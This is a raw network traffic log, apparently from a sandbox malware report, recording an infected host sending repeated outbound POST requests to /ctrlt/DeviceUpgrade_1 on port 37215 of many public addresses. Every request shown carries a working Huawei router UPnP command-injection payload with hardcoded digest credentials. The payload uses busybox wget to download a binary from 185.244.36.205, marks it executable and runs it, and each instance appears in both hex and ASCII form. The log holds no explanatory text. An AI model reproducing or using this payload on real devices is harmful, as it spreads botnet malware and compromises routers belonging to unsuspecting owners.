                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2308192.168.2.1538824156.168.79.19537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467768908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2309192.168.2.155785294.91.99.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467788935 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2310192.168.2.154433441.223.164.6637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467833042 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2311192.168.2.1544604157.110.219.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467847109 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2312192.168.2.155714639.99.21.23737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467849970 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2313192.168.2.154395437.8.206.11937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467957020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2314192.168.2.153455631.113.183.5237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467986107 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2315192.168.2.1544676138.36.179.1037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468013048 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2316192.168.2.1537218138.164.56.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468013048 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2317192.168.2.1553490156.77.183.15537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468025923 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2318192.168.2.154624840.12.24.20137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468056917 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
